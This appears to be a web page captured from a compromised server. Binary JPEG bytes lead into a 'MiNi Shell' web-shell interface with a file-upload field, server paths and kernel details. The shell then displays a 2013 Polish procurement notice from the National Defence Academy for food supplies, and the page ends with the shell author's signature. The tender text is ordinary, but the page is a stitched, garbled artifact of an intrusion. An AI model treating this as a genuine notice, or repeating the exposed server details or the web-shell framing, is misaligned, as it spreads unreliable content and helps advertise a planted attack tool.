JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131213/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131213/519798-N-2013.html

<p class="kh_header"><b>Warszawa: DOSTAWA RÓŻNYCH PRODUKTÓW SPOŻYWCZYCH</b><br>
<b>Numer ogłoszenia: 519798 - 2013; data zamieszczenia: 13.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Obrony Narodowej , al. Gen. A. Chruściela 103, 00-910 Warszawa, woj. mazowieckie, tel. 022 6813780, faks 022 6813175.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.aon.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA RÓŻNYCH PRODUKTÓW SPOŻYWCZYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.		Tuńczyk w sosie własnym - kawałki, op. 200-300 g	kg	300
2.		Mąka ziemniaczana, op. 1 - 2 kg	kg	20
3.		Kasza gryczana, op. 1 - 2 kg	kg	250
4.		Kasza jęczmienna pęczak, op. 1 - 2 kg	kg	250
5.		Kasza jęczmienna perłowa, op. 1 - 2 kg	kg	250
6.		Cebulki konserwowe po oddzieleniu zalewy op. 0,5 - 1 kg	kg	40
7.		Czosnek konserwowy po oddzieleniu zalewy op. 0,5 - 1 kg	kg	40
8.		Marchewka z groszkiem i kukurydzą konserwowa po oddzieleniu zalewy op. 1,5 - 3kg	kg	700
9.		Marchewka z groszkiem konserwowa po oddzieleniu zalewy op. 1,5 - 3 kg	kg	700
10.		Groszek konserwowy po oddzieleniu zalewy op. 1,5 - 3kg	kg	1600
11.		Seler konserwowy po oddzieleniu zalewy op. 0,5 - 1kg	kg	800
12.		Fasolka konserwowa po oddzieleniu zalewy op. 1,5 - 3kg	kg	1600
13.		Fasola czerwona konserwowa po oddzieleniu zalewy op. 1,5 - 3kg	kg	350
14.		Brzoskwinia konserwowa po oddzieleniu zalewy op. 0,3 - 0,8kg	kg	1200
15.		Ananas konserwowy po oddzieleniu zalewy op. 0,3 - 0,8kg	kg	800
16.		Sok (syrop) zagęszczony - koncentrat op. 0,5 - 1 l	l	100
17.		Rodzynki	kg	40
18.		Ryż op. 1-2 kg	kg	400
19.		Płatki śniadaniowe czekoladowe op. 1 - 5 kg	kg	250
20.		Pieczywo chrupkie (skład: mąka żytnia 50-60%, pełnoziarnista mąka pszenna 20-30%, mąka pszenna, odtłuszczone mleko w proszku, ekstrakt słodu jęczmiennego) opakowanie jednostkowe 100-150 g	kg	40
21.		Cukier biały op. 1 - 2 kg	kg	3200
22.		Cukier w kostkach op. 0,5 - 1 kg	kg	1000
23.		Cukier porcjowany op. 2 -5 g	kg	20
24.		Cukier puder op. 0,5 - 1 kg	kg	120
25.		Cukier waniliowy op. 0,1 - 0,5kg	kg	20
26.		Makaron dwujajeczny 9nitki, paski, kolanka) op. 1 - 5 kg	kg	800
27.		Ocet winny	l	20
28.		Sos sałatkowy	kg	100
29.		Przyprawa do flaków	kg	10
30.		Papryka mielona	kg	20
31.		Pieprz czarny mielony	kg	30
32.		Sól spożywcza op. 1-5 kg	kg	2000
33.		Barszcz biały	kg	150
34.		Zupa pieczarkowa	kg	100
35.		Zupy liofilizowane błyskawiczne -pomidorowa i rosół (skład: kluski - 88-95%: mąka pszenna, tłuszcz roślinny, sól, substancje spulchniające; mieszanka smakowa- 8-15%: sól, cukier, skrobia, substancje wzmacniające smak i zapach) Opakowanie jednostkowe 60-70g	kg	20
36.		Drożdże piekarskie	kg	40
37.		Proszek do pieczenia	kg	40
38.		Miód pszczeli (naturalny) jednoporcjowy	kg	800
39.		Łopatka konserwowa	kg	175
40.		Szynka konserwowa	kg	175
41.		Golonka konserwowa	kg	175
42.		Pasztet z Indyka	kg	175
43.		Fasola	kg	400
44.		Groch	kg	400
45.		Ogórki konserwowe 1250g po odcieku	kg	1500
46.		Papryka konserwowa 0,900g po odcieku	kg	1000
47.		Chrzan tarty	kg	400
48.		Buraczki konserwowe	kg	200
49.		Ćwikła z chrzanem	kg	200
50.		Sałatka warzywna 5-składnikowa	kg	1000
51.		Sałatka z czerwonej kapusty	kg	800
52.		Sałatka szwedzka z ogórka	kg	700
53.		Szczaw konserwowy	kg	200
54.		Przecier ogórkowy	kg	300
55.		Pieczarki konserwowe	kg	400
56.		Kukurydza konserwowa	kg	1600
57.		Leczo pieczarkowe	kg	350
58.		Koncentrat pomidorowy 30 %	kg	480
59.		Sok jabłkowy 1 l	l	800
60.		Nektar z czarnej porzeczki 1 l	l	800
61.		Sok pomarańczowy 1 l	l	800
62.		Sok wieloowocowy 1 l	l	800
63.		Dżem  truskawkowy 20 - 30 g	kg	200
64.		Dżem  truskawkowy	kg	400
65.		Dżem  wiśniowy 20-30 g	kg	200
66.		Dżem  wiśniowy	kg	400
67.		Dżem morelowy 20-30 g	kg	200
68.		Dżem  jagodowy 20-30 g	kg	200
69.		Powidła śliwkowe 20-30 g	kg	230
70.		Jabłka suszone	kg	20
71.		Śliwki suszone	kg	40
72.		Olej jadalny rzepakowy	l	400
73.		Olej jadalny słonecznikowy	l	1600
74.		Margaryny	kg	600
75.		Mąka pszenna  Szymanowska typ 480	kg	2500
76.		Kasza manna	kg	250
77.		Płatki owsiane	kg	250
78.		Płatki kukurydziane	kg	250
79.		Musli jabłkowe	kg	250
80.		Musli truskawkowe	kg	250
81.		Musli morelowe	kg	250
82.		Krakersy	kg	50
83.		Paluszki solone	kg	150
84.		Cukierki witaminizowane 100g różne smaki	kg	80
85.		Kakao 10-12% tł.	kg	300
86.		Herbata czarna granulowana	kg	150
87.		Herbata czarna liściasta	kg	150
88.		Herbata w torebkach (ekspresowa)	kg	20
89.		Przyprawa do zup w płynie	l	400
90.		Ocet	l	400
91.		Ketchup 4,5-5,5kg	kg	800
92.		Musztarda 4,5-5,5kg	kg	800
93.		Przyprawa do mięsa	kg	100
94.		Przyprawa do ryb	kg	50
95.		Przyprawa do drobiu	kg	80
96.		Przyprawa uniwersalna	kg	80
97.		Majonez 0,3-2 kg	kg	800
98.		Cynamon	kg	20
99.		Bazylia suszona	kg	20
100.		Oregano suszone	kg	20
101.		Liść laurowy	kg	10
102.		Majeranek	kg	10
103.		Ziele angielskie	kg	10
104.		Kwasek cytrynowy	kg	20
105.		Bulion drobiowy	kg	40
106.		Żelatyna spożywcza	kg	20
107.		Woda pitna but. gazowana 1,5 l	l	7000
108.		Woda pitna but. niegazowana 1,5l	l	7000
109.		Babeczki korpusy kruche 200g (24szt)	kg	15
110.		Borówka konserwowa do mięsa 260g	kg	20
111.		Czosnek mielony 50g	kg	40
112.		Galaretka owocowa (różne smaki) 75g	kg	30
113.		Gałka muszkatołowa mielona 10g	kg	10
114.		Gruszki konserwowe 820g	kg	50
115.		Mąka kukurydziana	kg	20
116.		Morele suszone 200g	kg	30
117.		Kapary w zalewie 100g	kg	30
118.		Kotlety sojowe	kg	10
119.		Majonez dekoracyjny 400g	kg	100
120.		Migdały płatki 100g	kg	20
121.		Oliwki  zielone w zalewie 750g drylowane	kg	100
122.		Oliwki  czarne w zalewie 750g drylowane	kg	20
123.		Orzechy włoskie łuskane 500g	kg	20
124.		Pieprz biały 250g	kg	10
125.		Pomidory suszone w zalewie 850g	kg	10
126.		Topping czekoladowy lub owocowy 200g	kg	40
127.		Szparagi konserwowe 212g	kg	40
128.		Sos tabasco 150g	kg	10
129.		Śmietana śnieżka w proszku saszetki 60g	kg	15
130.		Żurawina konserwowa do mięsa 300g	kg	60
131.		Jabłka prażone kostka 900g	kg	100
132.		Groszek ptysiowy 80g	kg	30
133.		Sos sojowy 150g	kg	30
134.		Budyń (waniliowy, śmietankowy) 60g	kg	130
135.		Kisiel (cytrynowy, jabłkowy) 77g	kg	15
136.		Rosół drobiowy kostka 180g (18szt)	kg	100
137.		Pomidory koktajlowe w zalewie 400g	kg	50
138.		Koncentrat barszczu czerwonego 320g	kg	40
139.		Ziarno sezamu 300g	kg	5
140.		Zupa krem borowikowy 1,3 kg	kg	80
141.		Zupa krem szparagowy 1,05 kg	kg	40
142.		Sos pieczeniowy ciemny 30g	kg	40
143.		Sos zielony pieprz 30g	kg	40
144.		Grzanki ziołowo czosnkowe	kg	100
145.		Borowiki suszone kl.1, 500g	kg	20
146.		Podgrzybki suszone kl.1 500g	kg	10
147.		Ciastka Delicje różne smaki	kg	100
148.		Ciastka Pieguski różne smaki	kg	100
149.		Ciastka Markizy różne smaki	kg	100
150.		Ciastka Jerzyki różne smaki	kg	100
151.		Ciastka piernik	kg	100
152.		Cukierki czekoladowe mieszanka Wedlowska różne smaki 2,5kg	kg	150
153.		Chipsy Lays różne smaki 70g	kg	200
154.		Chipsy Lays różne smaki 150g	kg	200
155.		Czekolada Alpen Gold mleczna nadziewana różne smaki 100g	kg	800
156.		Czekolada Alpen Gold Nussbeisser mleczna z orzechami 100g	kg	200
157.		Czekolada Alpen Gold mleczna  100g	kg	700
158.		Czekolada Alpen Gold goszka 100g	kg	400
159.		Czekolada Alpen Gold Bakaliowa 100g	kg	400
160.		Herbata Lipton Yellow Label 100 torebek	kg	100
161.		Herbata owocowa w saszetce ze sznurkiem i etykietą 100 torebek	kg	50
162.		Guma do żucia Orbit 10 drażetek różne smaki	kg	60
163.		Kawa rozpuszczalna Jacobs Cranat Gold 200g	kg	100
164.		Kawa rozpuszczalna Nescafe Gold 200g	kg	100
165.		Kawa rozpuszczalna Maxwell House 200g	kg	100
166.		Cukierki Tik Tak 16g różne smaki	kg	50
167.		Baton Prince polo 52g różne smaki	kg	70
168.		Baton Pawełek 45g różne smaki	kg	120
169.		Baton Twix 51g różne smaki	kg	70
170.		Baton Kit Kat 40g różne smaki	kg	70
171.		Baton Bajeczny 45g różne smaki	kg	70
172.		Baton Bounty 57g	kg	70
173.		Baton Grześki 39g różne smaki	kg	120
174.		Baton Mars 42g	kg	70
175.		Baton Snickers 51g	kg	70
176.		Baton Lion 43g	kg	70
177.		Baton WW 47g różne smak	kg	70.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.83.00.00-5, 15.84.00.00-8, 15.85.00.00-1, 15.86.00.00-4, 15.87.00.00-7, 15.89.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każda oferta musi być zabezpieczona wadium w wysokości 10.000,00 PLN.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez Wykonawcę, który posiada: aktualną decyzję administracyjną wydaną przez właściwy organ Państwowej Inspekcji Sanitarnej lub Weterynaryjnej o spełnianiu wymagań koniecznych do zapewnienia higieny w procesie produkcji lub w obrocie oraz do zapewnienia właściwej jakości zdrowotnej tych artykułów zgodnie z art. 62 ust. 1 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie Żywności i Żywienia - Dz. U. z dnia 27 września 2006 r. nr 171 poz. 1225 oraz ustawy z dnia 16 grudnia 2005 o produktach pochodzenia zwierzęcego - Dz. U. z 2006r. Nr 17 poz. 127 z poź. zm.;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku: 
Wykonawca składający ofertę musi wykazać że wykonał lub nadal wykonuje w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, jedną dostawę odpowiadającą swoim rodzajem dostawie stanowiącej przedmiot zamówienia, przy czym wartość tej dostawy była nie mniejsza niż 200.000,00 zł brutto, z podaniem wartości, przedmiotu, daty wykonania i odbiorcy, oraz załączy dokument potwierdzający, że dostawa ta  została wykonana należycie (np. referencje lub inne dokumenty potwierdzające). Informacje w zakresie wiedzy i doświadczenia należy przedstawić zgodnie z załącznikiem nr 4 do SIWZ;
Opis sposobu dokonywania oceny spełniania tego warunku: 
Ocena spełniania warunku, nastąpi na podstawie złożonego dokumentu metodą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczególnego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczególnego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczególnego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">w odniesieniu do zaświadczenia niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich - aktualny certyfikat wydany przez firmy posiadające akredytację i uprawnienia Polskiego Centrum Akredytacji z siedzibą w Warszawie oraz krajowej organizacji akredytacyjnej dla danego kraju lub aktualne zaświadczenie wydane przez właściwego terytorialnie Powiatowego Inspektora Państwowej Inspekcji Sanitarnej lub aktualny protokół z kontroli sanitarnej właściwego organu urzędowej kontroli wystawiony nie wcześniej niż 1 rok przed upływem terminu składania ofert, potwierdzającego stosowanie systemu HACCP</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W odniesieniu do koncesji, zezwolenie lub licencji 1. aktualna decyzja o spełnianiu wymagań koniecznych do zapewnienia higieny w procesie produkcji lub w obrocie oraz do zapewnienia właściwej jakości zdrowotnej tych artykułów zgodnie z art. 62 ust. 1 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie Żywności i Żywienia - Dz. U. z dnia 27 września 2006 r. nr 171 poz. 1225 - wydaną przez właściwy organ urzędowej kontroli Żywności - jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza  indeksację wynagrodzenia należnego Wykonawcy w przypadku wystąpienia nadzwyczajnych okoliczności tj. wysoka inflacja, poważne zakłócenia na rynku zaopatrzeniowym, załamanie wzrostu gospodarczego, klęska żywiołowa itd. lub jeżeli wskaźnik wzrostu cen towarów dla poszczególnych grup produktów, opublikowany przez Główny Urząd Statystyczny w publikacji branżowej Ceny, handel, usługi - wskaźnik zmiany cen żywności i napojów bezalkoholowych o tytule Ceny w gospodarce narodowej- miesięczne, ulegnie zmianie o co najmniej 5 % w stosunku do cen obowiązujących w umowie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.aon.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Adres jak na wstępie, budynek nr 4 pokój 128. Koszt SIWZ - 6,80 PLN. + koszty wysyłki. SIWZ można też pobrać ze strony internetowej Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.12.2013 godzina 09:30, miejsce: Oferty należy składać w siedzibie Zamawiającego, adres jak na wstępie w Kancelarii Jawnej AON - budynek nr 101 - pokój nr 210a (II piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com